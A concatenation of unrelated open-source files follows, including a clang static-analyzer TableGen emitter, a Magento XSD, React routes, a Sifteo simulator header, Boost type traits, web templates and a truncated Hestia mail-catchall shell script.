};
}
static void addPackageToCheckerGroup(const Record *package, const Record *group,
llvm::DenseMap<const Record *, GroupInfo *> &recordGroupMap) {
llvm::DenseSet<const Record *> &checkers = recordGroupMap[package]->Checkers;
for (llvm::DenseSet<const Record *>::iterator
I = checkers.begin(), E = checkers.end(); I != E; ++I)
recordGroupMap[group]->Checkers.insert(*I);
llvm::DenseSet<const Record *> &subGroups = recordGroupMap[package]->SubGroups;
for (llvm::DenseSet<const Record *>::iterator
I = subGroups.begin(), E = subGroups.end(); I != E; ++I)
addPackageToCheckerGroup(*I, group, recordGroupMap);
}
namespace clang {
void EmitClangSACheckers(RecordKeeper &Records, raw_ostream &OS) {
std::vector<Record*> checkers = Records.getAllDerivedDefinitions("Checker");
llvm::DenseMap<const Record *, unsigned> checkerRecIndexMap;
for (unsigned i = 0, e = checkers.size(); i != e; ++i)
checkerRecIndexMap[checkers[i]] = i;
// Invert the mapping of checkers to package/group into a one to many
// mapping of packages/groups to checkers.
std::map<std::string, GroupInfo> groupInfoByName;
llvm::DenseMap<const Record *, GroupInfo *> recordGroupMap;
std::vector<Record*> packages = Records.getAllDerivedDefinitions("Package");
for (unsigned i = 0, e = packages.size(); i != e; ++i) {
Record *R = packages[i];
std::string fullName = getPackageFullName(R);
if (!fullName.empty()) {
GroupInfo &info = groupInfoByName[fullName];
info.Hidden = isHidden(*R);
recordGroupMap[R] = &info;
}
}
std::vector<Record*>
checkerGroups = Records.getAllDerivedDefinitions("CheckerGroup");
for (unsigned i = 0, e = checkerGroups.size(); i != e; ++i) {
Record *R = checkerGroups[i];
std::string name = R->getValueAsString("GroupName");
if (!name.empty()) {
GroupInfo &info = groupInfoByName[name];
recordGroupMap[R] = &info;
}
}
for (unsigned i = 0, e = checkers.size(); i != e; ++i) {
Record *R = checkers[i];
Record *package = nullptr;
if (DefInit *
DI = dyn_cast<DefInit>(R->getValueInit("ParentPackage")))
package = DI->getDef();
if (!isCheckerNamed(R) && !package)
PrintFatalError(R->getLoc(), "Checker '" + R->getName() +
"' is neither named, nor in a package!");
if (isCheckerNamed(R)) {
// Create a pseudo-group to hold this checker.
std::string fullName = getCheckerFullName(R);
GroupInfo &info = groupInfoByName[fullName];
info.Hidden = R->getValueAsBit("Hidden");
recordGroupMap[R] = &info;
info.Checkers.insert(R);
} else {
recordGroupMap[package]->Checkers.insert(R);
}
Record *currR = isCheckerNamed(R) ? R : package;
// Insert the checker and its parent packages into the subgroups set of
// the corresponding parent package.
while (DefInit *DI
= dyn_cast<DefInit>(currR->getValueInit("ParentPackage"))) {
Record *parentPackage = DI->getDef();
recordGroupMap[parentPackage]->SubGroups.insert(currR);
currR = parentPackage;
}
// Insert the checker into the set of its group.
if (DefInit *DI = dyn_cast<DefInit>(R->getValueInit("Group")))
recordGroupMap[DI->getDef()]->Checkers.insert(R);
}
// If a package is in a group, add all of its checkers and its sub-packages'
// checkers into the group.
for (unsigned i = 0, e = packages.size(); i != e; ++i)
if (DefInit *DI = dyn_cast<DefInit>(packages[i]->getValueInit("Group")))
addPackageToCheckerGroup(packages[i], DI->getDef(), recordGroupMap);
typedef std::map<std::string, const Record *> SortedRecords;
typedef llvm::DenseMap<const Record *, unsigned> RecToSortIndex;
SortedRecords sortedGroups;
RecToSortIndex groupToSortIndex;
OS << "\n#ifdef GET_GROUPS\n";
{
for (unsigned i = 0, e = checkerGroups.size(); i != e; ++i)
sortedGroups[checkerGroups[i]->getValueAsString("GroupName")]
= checkerGroups[i];
unsigned sortIndex = 0;
for (SortedRecords::iterator
I = sortedGroups.begin(), E = sortedGroups.end(); I != E; ++I) {
const Record *R = I->second;
OS << "GROUP(" << "\"";
OS.write_escaped(R->getValueAsString("GroupName")) << "\"";
OS << ")\n";
groupToSortIndex[R] = sortIndex++;
}
}
OS << "#endif // GET_GROUPS\n\n";
OS << "\n#ifdef GET_PACKAGES\n";
{
SortedRecords sortedPackages;
for (unsigned i = 0, e = packages.size(); i != e; ++i)
sortedPackages[getPackageFullName(packages[i])] = packages[i];
for (SortedRecords::iterator
I = sortedPackages.begin(), E = sortedPackages.end(); I != E; ++I) {
const Record &R = *I->second;
OS << "PACKAGE(" << "\"";
OS.write_escaped(getPackageFullName(&R)) << "\", ";
// Group index
if (DefInit *DI = dyn_cast<DefInit>(R.getValueInit("Group")))
OS << groupToSortIndex[DI->getDef()] << ", ";
else
OS << "-1, ";
// Hidden bit
if (isHidden(R))
OS << "true";
else
OS << "false";
OS << ")\n";
}
}
OS << "#endif // GET_PACKAGES\n\n";
OS << "\n#ifdef GET_CHECKERS\n";
for (unsigned i = 0, e = checkers.size(); i != e; ++i) {
const Record &R = *checkers[i];
OS << "CHECKER(" << "\"";
std::string name;
if (isCheckerNamed(&R))
name = getCheckerFullName(&R);
OS.write_escaped(name) << "\", ";
OS << R.getName() << ", ";
OS << getStringValue(R, "DescFile") << ", ";
OS << "\"";
OS.write_escaped(getStringValue(R, "HelpText")) << "\", ";
// Group index
if (DefInit *DI = dyn_cast<DefInit>(R.getValueInit("Group")))
OS << groupToSortIndex[DI->getDef()] << ", ";
else
OS << "-1, ";
// Hidden bit
if (isHidden(R))
OS << "true";
else
OS << "false";
OS << ")\n";
}
OS << "#endif // GET_CHECKERS\n\n";
unsigned index = 0;
for (std::map<std::string, GroupInfo>::iterator
I = groupInfoByName.begin(), E = groupInfoByName.end(); I != E; ++I)
I->second.Index = index++;
// Walk through the packages/groups/checkers emitting an array for each
// set of checkers and an array for each set of subpackages.
OS << "\n#ifdef GET_MEMBER_ARRAYS\n";
unsigned maxLen = 0;
for (std::map<std::string, GroupInfo>::iterator
I = groupInfoByName.begin(), E = groupInfoByName.end(); I != E; ++I) {
maxLen = std::max(maxLen, (unsigned)I->first.size());
llvm::DenseSet<const Record *> &checkers = I->second.Checkers;
if (!checkers.empty()) {
OS << "static const short CheckerArray" << I->second.Index << "[] = { ";
// Make the output order deterministic.
std::map<int, const Record *> sorted;
for (llvm::DenseSet<const Record *>::iterator
I = checkers.begin(), E = checkers.end(); I != E; ++I)
sorted[(*I)->getID()] = *I;
for (std::map<int, const Record *>::iterator
I = sorted.begin(), E = sorted.end(); I != E; ++I)
OS << checkerRecIndexMap[I->second] << ", ";
OS << "-1 };\n";
}
llvm::DenseSet<const Record *> &subGroups = I->second.SubGroups;
if (!subGroups.empty()) {
OS << "static const short SubPackageArray" << I->second.Index << "[] = { ";
// Make the output order deterministic.
std::map<int, const Record *> sorted;
for (llvm::DenseSet<const Record *>::iterator
I = subGroups.begin(), E = subGroups.end(); I != E; ++I)
sorted[(*I)->getID()] = *I;
for (std::map<int, const Record *>::iterator
I = sorted.begin(), E = sorted.end(); I != E; ++I) {
OS << recordGroupMap[I->second]->Index << ", ";
}
OS << "-1 };\n";
}
}
OS << "#endif // GET_MEMBER_ARRAYS\n\n";
OS << "\n#ifdef GET_CHECKNAME_TABLE\n";
for (std::map<std::string, GroupInfo>::iterator
I = groupInfoByName.begin(), E = groupInfoByName.end(); I != E; ++I) {
// Group option string.
OS << " { \"";
OS.write_escaped(I->first) << "\","
<< std::string(maxLen-I->first.size()+1, ' ');
if (I->second.Checkers.empty())
OS << "0, ";
else
OS << "CheckerArray" << I->second.Index << ", ";
// Subgroups.
if (I->second.SubGroups.empty())
OS << "0, ";
else
OS << "SubPackageArray" << I->second.Index << ", ";
OS << (I->second.Hidden ? "true" : "false");
OS << " },\n";
}
OS << "#endif // GET_CHECKNAME_TABLE\n\n";
}
} // end namespace clang
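// ---------------------------------------------------------------------------
// Consumption sketch (not part of the emitter above; the .inc file name and the
// macro expansion are illustrative assumptions): the generated tables are meant
// to be textually included with one GET_* guard and the matching table macro
// defined by the consumer. GET_GROUPS yields GROUP("name"), GET_PACKAGES yields
// PACKAGE("name", groupIndex, hidden), and GET_CHECKERS yields
// CHECKER(fullName, class, descFile, helpText, groupIndex, hidden):
//
//   #define GET_CHECKERS
//   #define CHECKER(FULLNAME, CLASS, DESCFILE, HELPTEXT, GROUPINDEX, HIDDEN) \
//     { FULLNAME, HELPTEXT, GROUPINDEX, HIDDEN },
//   #include "Checkers.inc"
//   #undef CHECKER
//   #undef GET_CHECKERS
// ---------------------------------------------------------------------------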
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!--
/**
* Copyright © Magento, Inc. All rights reserved.
* See COPYING.txt for license details.
*/
-->
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" elementFormDefault="qualified">
<!-- Include section -->
<xs:include schemaLocation="urn:magento:module:Magento_Ui:view/base/ui_component/etc/definition/ui_component.xsd"/>
<xs:complexType name="componentFile">
<xs:sequence>
<xs:group ref="configurable" minOccurs="0" maxOccurs="unbounded"/>
<xs:element name="settings" minOccurs="0" maxOccurs="1">
<xs:complexType>
<xs:choice minOccurs="0" maxOccurs="unbounded">
<xs:group ref="abstractSettings"/>
<xs:group ref="componentFileSettings"/>
</xs:choice>
</xs:complexType>
</xs:element>
</xs:sequence>
<xs:attributeGroup ref="ui_element_attributes"/>
</xs:complexType>
<xs:complexType name="formElementFile">
<xs:sequence>
<xs:element name="settings" minOccurs="0" maxOccurs="1">
<xs:complexType>
<xs:choice minOccurs="0" maxOccurs="unbounded">
<xs:group ref="componentFileSettings"/>
</xs:choice>
</xs:complexType>
</xs:element>
</xs:sequence>
<xs:attributeGroup ref="ui_element_attributes"/>
</xs:complexType>
<xs:group name="componentFileSettings">
<xs:choice>
</xs:choice>
</xs:group>
</xs:schema>
| {
"pile_set_name": "Github"
} |
{
"prefix": "oo-ui-icon",
"intro": "@import '../../../../src/styles/common';",
"images": {
"indent": { "file": {
"ltr": "images/icons/indent-ltr.svg",
"rtl": "images/icons/indent-rtl.svg"
} },
"listBullet": { "file": {
"ltr": "images/icons/listBullet-ltr.svg",
"rtl": "images/icons/listBullet-rtl.svg"
} },
"listNumbered": { "file": {
"ltr": "images/icons/listNumbered-ltr.svg",
"rtl": "images/icons/listNumbered-rtl.svg"
} },
"outdent": { "file": {
"ltr": "images/icons/outdent-ltr.svg",
"rtl": "images/icons/outdent-rtl.svg"
} }
}
}
| {
"pile_set_name": "Github"
} |
/*
* All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
* its licensors.
*
* For complete copyright and license terms please see the LICENSE at the root of this
* distribution (the "License"). All use of this software is governed by the License,
* or, if provided, by the license below or the license accompanying this file. Do not
* remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*
*/
#pragma once
#include <AzCore/Component/Component.h>
#include <AzCore/std/containers/unordered_map.h>
#include <ScriptCanvas/Execution/ExecutionBus.h>
#include <ScriptCanvas/Variable/VariableBus.h>
#include <ScriptCanvas/Variable/VariableData.h>
#include <ScriptCanvas/Core/GraphBus.h>
namespace ScriptCanvas
{
// Implements methods to add/remove/find Script Canvas Data objects associated with the Script Canvas graph
    // The VariableRequestBus is addressed by VariableId
    // The VariableGraphRequestBus is addressed using the UniqueId of the ScriptCanvas Graph Component at runtime and editor time
    // (NOTE: this is not the EntityId that the Graph is attached to, but an ID that is tied only to the Graph Component)
    // In addition, at editor time the VariableGraphRequestBus can be addressed using the EntityId that this component is attached to.
class GraphVariableManagerComponent
: public AZ::Component
, protected GraphConfigurationNotificationBus::Handler
, protected GraphVariableManagerRequestBus::Handler
, protected VariableRequestBus::MultiHandler
{
public:
AZ_COMPONENT(GraphVariableManagerComponent, "{825DC28D-667D-43D0-AF11-73681351DD2F}");
static void Reflect(AZ::ReflectContext* context);
GraphVariableManagerComponent();
GraphVariableManagerComponent(ScriptCanvasId scriptCanvasId);
~GraphVariableManagerComponent() override;
void Init() override;
void Activate() override;
void Deactivate() override;
// GraphConfigurationNotificationBus
void ConfigureScriptCanvasId(const ScriptCanvasId& scriptCanvasId) override;
////
ScriptCanvasId GetScriptCanvasId() const { return m_scriptCanvasId; }
//// VariableRequestBus
GraphVariable* GetVariable() override;
const GraphVariable* GetVariableConst() const override { return const_cast<GraphVariableManagerComponent*>(this)->GetVariable(); }
Data::Type GetType() const override;
AZStd::string_view GetName() const override;
AZ::Outcome<void, AZStd::string> RenameVariable(AZStd::string_view newVarName) override;
//// GraphVariableManagerRequestBus
AZ::Outcome<VariableId, AZStd::string> CloneVariable(const GraphVariable& variableConfiguration) override;
AZ::Outcome<VariableId, AZStd::string> RemapVariable(const GraphVariable& variableConfiguration) override;
AZ::Outcome<VariableId, AZStd::string> AddVariable(AZStd::string_view name, const Datum& value) override;
AZ::Outcome<VariableId, AZStd::string> AddVariablePair(const AZStd::pair<AZStd::string_view, Datum>& nameValuePair) override;
VariableValidationOutcome IsNameValid(AZStd::string_view key) override;
bool RemoveVariable(const VariableId& variableId) override;
AZStd::size_t RemoveVariableByName(AZStd::string_view variableName) override;
GraphVariable* FindVariable(AZStd::string_view propName) override;
GraphVariable* FindVariableById(const VariableId& variableId) override;
GraphVariable* FindFirstVariableWithType(const Data::Type& dataType, const AZStd::unordered_set< ScriptCanvas::VariableId >& blacklistId) override;
Data::Type GetVariableType(const VariableId& variableId) override;
const GraphVariableMapping* GetVariables() const override;
AZStd::string_view GetVariableName(const VariableId&) const override;
AZ::Outcome<void, AZStd::string> RenameVariable(const VariableId&, AZStd::string_view) override;
bool IsRemappedId(const VariableId& remappedId) const override;
////
GraphVariableMapping* GetVariables();
const VariableData* GetVariableDataConst() const override { return &m_variableData; }
VariableData* GetVariableData() override { return &m_variableData; }
void SetVariableData(const VariableData& variableData) override;
void DeleteVariableData(const VariableData& variableData) override;
protected:
static void GetProvidedServices(AZ::ComponentDescriptor::DependencyArrayType& provided)
{
provided.push_back(AZ_CRC("ScriptCanvasVariableService", 0x819c8460));
}
void RegisterCopiedVariableRemapping(const VariableId& originalValue, const VariableId& remappedId);
void UnregisterUncopiedVariableRemapping(const VariableId& remappedId);
VariableId FindCopiedVariableRemapping(const VariableId& variableId) const;
VariableData m_variableData;
private:
ScriptCanvasId m_scriptCanvasId;
AZStd::unordered_map< VariableId, VariableId > m_copiedVariableRemapping;
};
}
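// ---------------------------------------------------------------------------
// Hypothetical usage sketch (not taken from the ScriptCanvas sources): requests
// go through GraphVariableManagerRequestBus, addressed by the graph's
// ScriptCanvasId. The request-interface name used with EventResult below
// follows the usual AZ::EBus naming convention and is an assumption.
//
//   ScriptCanvas::GraphVariable* variable = nullptr;
//   ScriptCanvas::GraphVariableManagerRequestBus::EventResult(
//       variable, scriptCanvasId,
//       &ScriptCanvas::GraphVariableManagerRequests::FindVariable, "Health");
// ---------------------------------------------------------------------------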
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=<?php echo $cfg_soft_lang; ?>">
<title>编辑评论</title>
<style type="text/css">
<!--
body {
background-image: url(images/allbg.gif);
}
-->
</style>
<link href="css/base.css" rel="stylesheet" type="text/css">
</head>
<body>
<table width="98%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="#D6D6D6">
<tr>
<td width="100%" height="24" colspan="2" background="images/tbg.gif">
<strong><a href="<?php echo $ENV_GOBACK_URL; ?>"><u>表单管理</u></a> >> 编辑评论:</strong> </td>
</tr>
<tr>
<td height="167" colspan="2" align="center" bgcolor="#FFFFFF" valign="top">
<form name="form1" method="post" enctype="multipart/form-data" action="diy_list.php?action=edit&diyid=<?php echo $diy->diyid ?>&id=<?php echo $row['id'] ?>&do=2">
<input type="hidden" name="dopost" value="edit" />
<input type="hidden" name="id" value="<?php echo $row['id']; ?>" />
<table width="100%" border="0" cellpadding="3" cellspacing="1" style="text-align:left;">
<?php
$formfields = '';
foreach($fieldlist as $field=>$fielddata)
{
$allowhtml = array('htmltext');
if($row[$field]=='') continue;
if($fielddata[1]=='img')
{
$row[$field] = "<input name='photo' type='file' /> <a href='{$row[$field]}' target='_blank'><img src='images/channeladd.gif' border='0' /> 浏览原图</a> <a href='diy_list.php?action=delete&diyid=$diy->diyid&id=$row[id]&do=1&name=$field'>删除原图</a>\r\n";
}
else if($fielddata[1]=='addon')
{
$row[$field] = "<input name='file' type='file' /> <a href='{$row[$field]}' target='_blank'><img src='images/channeladd.gif' border='0' /> 浏览原附件</a> <a href='diy_list.php?action=delete&diyid=$diy->diyid&id=$row[id]&do=1&name=$field'>删除原附件</a>";
}
else
{
if(!in_array($fielddata[1],$allowhtml)){
$row[$field] = dede_htmlspecialchars($row[$field]);
$row[$field] = "<input type='text' name='".$field."' value='".$row[$field]."'/>";
}
}
echo '<tr bgcolor="#ffffff"><td width="20%" height="24">'.$fielddata[0].':'.'</td><td width="80%">'.$row[$field].'</td></tr>';
$formfields .= $formfields == ''? $field.','.$fielddata[1] : ';'.$field.','.$fielddata[1];
}
echo "<input type='hidden' name='dede_fields' value='".$formfields."'>";
?>
<tr bgcolor="#FFFFFF">
<td height="40" width='600' colspan="2" align="center">
<input type="submit" name="Submit1" class='coolbg np' value="保存更改" />
<input type="button" name="Submit2" class='coolbg np' value="不理返回" onClick="location='<?php echo $ENV_GOBACK_URL; ?>';" />
</td>
</tr>
</table>
</form>
</td>
</tr>
</table>
</body>
</html> | {
"pile_set_name": "Github"
} |
import AsyncComponent from '../components/AsyncComponent'
const Home = AsyncComponent(() => import('../page/home'))
const Topic = AsyncComponent(() => import('../page/topic'))
const Catelog = AsyncComponent(() => import('../page/catelog'))
const Cart = AsyncComponent(() => import('../page/cart'))
const Mine = AsyncComponent(() => import('../page/mine'))
const Categorys = AsyncComponent(() => import('../page/categorys'))
const Goods = AsyncComponent(() => import('../page/goods'))
const BrandDetail = AsyncComponent(() => import('../page/brandDetail'))
const TopicDetail = AsyncComponent(() => import('../page/topicDetail'))
const Comment = AsyncComponent(() => import('../page/comment'))
const TopicCommentWrite = AsyncComponent(() =>
import('../page/topicCommentWrite')
)
const GoodsSearch = AsyncComponent(() => import('../page/goodsSearch'))
const Collect = AsyncComponent(() => import('../page/collect'))
const Address = AsyncComponent(() => import('../page/address'))
const OrderConfirm = AsyncComponent(() => import('../page/orderConfirm'))
const routes = [
{
name: '首页',
isTab: true,
link: '/home',
component: Home
},
{
name: '专题',
link: '/topic',
isTab: true,
component: Topic
},
{
name: '分类',
link: '/catelog',
isTab: true,
component: Catelog
},
{
name: '购物车',
link: '/cart',
isTab: true,
component: Cart
},
{
name: '我的',
link: '/mine',
isTab: true,
component: Mine
},
{
name: '分类商品',
link: '/categorys/:id',
isTab: false,
component: Categorys
},
{
name: '商品详情',
link: '/goods/:id',
isTab: false,
component: Goods
},
{
name: '制造商详情',
link: '/brandDetail/:id',
isTab: false,
component: BrandDetail
},
{
name: '专题详情',
link: '/topicDetail/:id',
isTab: false,
component: TopicDetail
},
{
name: '评论页',
link: '/comment/:id',
isTab: false,
component: Comment
},
{
name: '写专题评论',
link: '/topicCommentWrite/:id',
isTab: false,
component: TopicCommentWrite
},
{
name: '商品查询',
link: '/goodsSearch',
isTab: false,
component: GoodsSearch
},
{
name: '收藏商品',
link: '/collect',
isTab: false,
component: Collect
},
{
name: '地址管理',
link: '/address',
isTab: false,
component: Address
},
{
name: '订单确认',
link: '/orderConfirm',
isTab: false,
component: OrderConfirm
}
]
export default routes
| {
"pile_set_name": "Github"
} |
/* -*- mode: C; c-basic-offset: 4; intent-tabs-mode: nil -*-
*
* Sifteo Thundercracker simulator
* Micah Elizabeth Scott <[email protected]>
*
 * Copyright (c) 2011 Sifteo, Inc.
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
#ifndef _CUBE_HARDWARE_H
#define _CUBE_HARDWARE_H
#include <algorithm>
#include "cube_cpu.h"
#include "cube_radio.h"
#include "cube_adc.h"
#include "cube_accel.h"
#include "cube_spi.h"
#include "cube_i2c.h"
#include "cube_mdu.h"
#include "cube_ccp.h"
#include "cube_rng.h"
#include "cube_lcd.h"
#include "cube_backlight.h"
#include "cube_flash.h"
#include "cube_neighbors.h"
#include "cube_cpu_core.h"
#include "cube_debug.h"
#include "vtime.h"
#include "tracer.h"
#include "flash_storage.h"
namespace Cube {
/*
* This file simulates the hardware peripherals that we have directly
* attached to the 8051.
*/
static const uint8_t ADDR_PORT = REG_P0;
static const uint8_t MISC_PORT = REG_P1;
static const uint8_t BUS_PORT = REG_P2;
static const uint8_t CTRL_PORT = REG_P3;
static const uint8_t ADDR_PORT_DIR = REG_P0DIR;
static const uint8_t MISC_PORT_DIR = REG_P1DIR;
static const uint8_t BUS_PORT_DIR = REG_P2DIR;
static const uint8_t CTRL_PORT_DIR = REG_P3DIR;
static const uint8_t MISC_TOUCH = (1 << 7);
static const uint8_t CTRL_LCD_DCX = (1 << 0);
static const uint8_t CTRL_FLASH_LAT1 = (1 << 1);
static const uint8_t CTRL_FLASH_LAT2 = (1 << 2);
static const uint8_t CTRL_3V3_EN = (1 << 3);
static const uint8_t CTRL_DS_EN = (1 << 4);
static const uint8_t CTRL_FLASH_WE = (1 << 5);
static const uint8_t CTRL_FLASH_OE = (1 << 6);
// RFCON bits
static const uint8_t RFCON_RFCKEN = 0x04;
static const uint8_t RFCON_RFCSN = 0x02;
static const uint8_t RFCON_RFCE = 0x01;
class Hardware {
public:
CPU::em8051 cpu;
VirtualTime *time;
LCD lcd;
Backlight backlight;
SPIBus spi;
I2CBus i2c;
ADC adc;
MDU mdu;
CCP ccp;
Flash flash;
Neighbors neighbors;
RNG rng;
bool init(VirtualTime *masterTimer, const char *firmwareFile,
FlashStorage::CubeRecord *flashStorage);
void reset();
void fullReset();
ALWAYS_INLINE unsigned id() const {
return cpu.id;
}
uint64_t getHWID() const;
ALWAYS_INLINE unsigned getNeighborID() const {
// This is assigned by the cube firmware, and stored for our perusal in an unused SFR.
return cpu.mSFR[0xA1 - 0x80];
}
ALWAYS_INLINE void tick(bool *cpuTicked=NULL) {
CPU::em8051_tick(&cpu, 1, cpu.sbt, cpu.mProfileData != NULL, Tracer::isEnabled(), cpu.mBreakpoint != 0, cpuTicked);
hardwareTick();
}
ALWAYS_INLINE unsigned tickFastSBT(unsigned tickBatch=1) {
/*
* Assume at compile-time that we're in SBT mode, and no debug features are active.
* Also try to aggressively skip ticks when possible. The fastest code is code that never runs.
* Returns the number of ticks that may be safely batched next time.
*
* Also note that we calculate our remaining clock cycles using 32-bit math, and we blindly
* truncate the output of remaining(). This is intentional; normally remaining() will fit in
* 32 bits, but even if it does cause overflow the worst case is that we'll end up skipping
* fewer ticks than possible. So, this is always safe, and it's highly important for performance
* when we're running on 32-bit platforms.
*
* Assumes the caller has already checked isSleeping().
*/
CPU::em8051_tick(&cpu, tickBatch, true, false, false, false, NULL);
hardwareTick();
return std::min(std::min(cpu.mTickDelay, (unsigned)cpu.prescaler12),
(unsigned)hwDeadline.remaining());
}
void lcdPulseTE() {
if (time != NULL)
lcd.pulseTE(hwDeadline);
}
void setAcceleration(float xG, float yG, float zG);
void setTouch(bool touching);
bool isDebugging();
void initVCD(VCDWriter &vcd);
// SFR side-effects
void sfrWrite(int reg);
int sfrRead(int reg);
void debugByte();
void graphicsTick();
ALWAYS_INLINE void setRadioClockEnable(bool e) {
rfcken = e;
}
ALWAYS_INLINE bool isRadioClockRunning() {
return rfcken && !cpu.powerDown;
}
uint32_t getExceptionCount();
void incExceptionCount();
void logWatchdogReset();
void traceExecution();
bool testWakeOnPin();
ALWAYS_INLINE uint8_t readFlashBus() {
if (LIKELY(flash_drv))
cpu.mSFR[BUS_PORT] = flash.dataOut();
return cpu.mSFR[BUS_PORT];
}
private:
ALWAYS_INLINE void hardwareTick()
{
/*
* A big chunk of our work can happen less often than every
* clock cycle, as determined by a simple deadline tracker.
*
* We also trigger hardware writes via a simpler (and shorter
* to inline) method, just by writing to a byte in the CPU
* struct. This is used by the inline SFR callbacks
* in cube_cpu_callbacks.h.
*
* We can safely assume that needHardwareTick is set by CPU code,
* before hardwareTick executes, and that it won't be set during
* hwDeadlineWork().
*/
if (hwDeadline.hasPassed() || cpu.needHardwareTick)
hwDeadlineWork();
if (testWakeOnPin())
CPU::wake_from_sleep(&cpu, 0x80);
}
int16_t scaleAccelAxis(float g);
void hwDeadlineWork();
TickDeadline hwDeadline;
uint8_t lat1;
uint8_t lat2;
uint8_t bus;
uint8_t prev_ctrl_port;
uint8_t flash_drv;
uint8_t rfcken;
uint32_t exceptionCount;
};
}; // namespace Cube
#endif
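/*
 * Minimal usage sketch (assumptions: the VirtualTime instance and the
 * FlashStorage::CubeRecord are set up elsewhere by the simulator, and the
 * firmware file name is illustrative). Only members declared above are used.
 *
 *   Cube::Hardware cube;
 *   if (cube.init(&vtime, "cube.hex", &storageRecord)) {
 *       for (;;) {
 *           bool cpuTicked;
 *           cube.tick(&cpuTicked);   // advance the CPU and peripherals by one cycle
 *       }
 *   }
 */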
| {
"pile_set_name": "Github"
} |
// (C) Copyright Dave Abrahams, Steve Cleary, Beman Dawes, Howard
// Hinnant & John Maddock 2000.
// Use, modification and distribution are subject to the Boost Software License,
// Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt).
//
// See http://www.boost.org/libs/type_traits for most recent version including documentation.
#ifndef BOOST_TT_ADD_CV_HPP_INCLUDED
#define BOOST_TT_ADD_CV_HPP_INCLUDED
#include <boost/config.hpp>
namespace boost {
// * convert a type T to a const volatile type - add_cv<T>
// this is not required since the result is always
// the same as "T const volatile", but it does suppress warnings
// from some compilers:
#if defined(BOOST_MSVC)
// This bogus warning will appear when add_volatile is applied to a
// const volatile reference because we can't detect const volatile
// references with MSVC6.
# pragma warning(push)
# pragma warning(disable:4181) // warning C4181: qualifier applied to reference type ignored
#endif
template <class T> struct add_cv{ typedef T const volatile type; };
#if defined(BOOST_MSVC)
# pragma warning(pop)
#endif
template <class T> struct add_cv<T&>{ typedef T& type; };
} // namespace boost
#endif // BOOST_TT_ADD_CV_HPP_INCLUDED
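// Usage sketch (kept as a comment so the header itself is unchanged; assumes a
// C++11 compiler for static_assert, with is_same from Boost.TypeTraits):
// add_cv yields "T const volatile" for ordinary types and leaves references
// untouched.
//
//   #include <boost/type_traits/add_cv.hpp>
//   #include <boost/type_traits/is_same.hpp>
//   static_assert(boost::is_same<boost::add_cv<int>::type, const volatile int>::value, "");
//   static_assert(boost::is_same<boost::add_cv<int&>::type, int&>::value, "");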
| {
"pile_set_name": "Github"
} |
{% extends "base.html" %}
{% load smartmin i18n %}
{% block content %}
<div class="row">
<div class="col-md-7 col-md-offset-2">
<div class="alert alert-danger">
<div class="page-header"><h2>{% trans "Login Failure" %}</h2></div>
<p>
{% blocktrans %}
Sorry, you cannot log in at this time because we received {{failed_login_limit}} incorrect login attempts.
{% endblocktrans %}
</p>
{% if lockout_timeout >= 0 %}
<p>
{% blocktrans %}
          Please wait {{lockout_timeout}} minutes before trying to log in again.
{% endblocktrans %}
</p>
{% endif %}
{% if allow_email_recovery %}
<p>{% trans "Alternatively, you can fill out the form below to have your password reset via e-mail." %}</p>
{% else %}
<p>{% trans "Please contact the website administrator to have your password reset." %}</p>
{% endif %}
</div>
</div>
</div>
{% if allow_email_recovery %}
<div class="row" >
<div class="col-md-7 col-md-offset-2">
<form class="form-inline" method="post" action="{% url 'users.user_forget' %}">
{% csrf_token %}
<fieldset>
<label>{% trans "Email Address" %}</label>
<input class="col-md-4" type="text" name="email">
<input type="submit" value='{% trans "Recover" %}' class="btn btn-primary">
</fieldset>
</form>
</div>
</div>
{% endif %}
{% endblock %}
| {
"pile_set_name": "Github"
} |
#!/bin/bash
# info: add mail domain catchall account
# options: USER DOMAIN EMAIL
#
# The function enables a catchall account for incoming emails.
#----------------------------------------------------------#
# Variable&Function #
#----------------------------------------------------------#
# Argument definition
user=$1
domain=$2
domain_idn=$2
email="$3"
# Includes
source $HESTIA/func/main.sh
source $HESTIA/func/domain.sh
source $HESTIA/conf/hestia.conf
# Additional argument formatting
format_domain
format_domain_idn
#----------------------------------------------------------#
# Verifications #
#----------------------------------------------------------#
check_args '3' "$#" 'USER DOMAIN EMAIL'
is_format_valid 'user' 'domain' 'email'
is_system_enabled "$MAIL_SYSTEM" 'MAIL_SYSTEM'
is_object_valid 'user' 'USER' "$user"
is_object_unsuspended 'user' 'USER' "$user"
is_object_valid 'mail' 'DOMAIN' "$domain"
is_object_unsuspended 'mail' 'DOMAIN' "$domain"
is_object_value_empty 'mail' 'DOMAIN' "$domain" '$CATCHALL'
# Perform verification if read-only mode is enabled
check_hestia_demo_mode
#----------------------------------------------------------#
# Action #
#----------------------------------------------------------#
# Adding catchall alias
if [[ "$MAIL_SYSTEM" =~ exim ]]; then
sed -i "/*@$domain_idn:/d" $HOMEDIR/$user/conf/mail/$domain/aliases
